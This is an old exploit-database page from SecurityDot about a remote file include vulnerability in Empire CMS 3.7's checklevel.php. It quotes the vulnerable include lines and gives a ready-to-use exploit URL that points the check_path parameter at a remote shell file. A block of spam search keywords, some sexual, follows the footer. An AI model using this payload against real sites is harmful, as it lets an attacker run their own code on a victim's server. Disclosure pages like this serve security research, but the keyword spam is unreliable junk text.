about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability




2006-08-22 Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability 
Rated as : High Risk

    Empire CMS <=3.7 (checklevel.php) Remote File Include
Vulnerability
           Find by: Bob Linuson

# Code:

2   $includefile=$check_path."e/class/MemberLevel.php";
3   include("$includefile");
.....
67  include($check_path."e/class/connect.php");
68  include($check_path."e/class/db_sql.php");
69  include($check_path."e/class/user.php");


#Exploit:

http://www.site.com/e/class/checklevel.php?check_path=http://shell.txt?


#URL:

http://www.phome.net/tmp/ecms37/
http://www.phome.net/tmp/ecms37/down.php?url=/tmp/ecms37/ecms3.7-free.rar&
english:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.phome.net%2Ftmp%2Fecms37%2F&langpair=zh-CN%7Cen&hl=zh-CN&newwindow=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools
securitydot.net - 2006-08-22

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 16:53:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
php-nuke+2 news for c Phonertica www.freefo www.mobil9 apache 1.3 sex4000.it News Searc dbftp apache 1.3 vod.medice www.moqies www xxx vi Nagma nude pak sex fzl-china. sploit Adegan pan Old moms lanyu8.cn 200 /compo php-nuke 2 SNDCP wwvv.org.u www.trish Quick.Cart Sexyindian news for C plesk 8.1. mambo Remo 788111xxw. for sex vi localhost news for c xp/exploit php-nuke 2 200 /compo www.89.c0m /component www.008080 PHP4.3.11 nursing News Searc xax cafesgame. Www pakist 200 /compo malayamsex www.tuofan news for C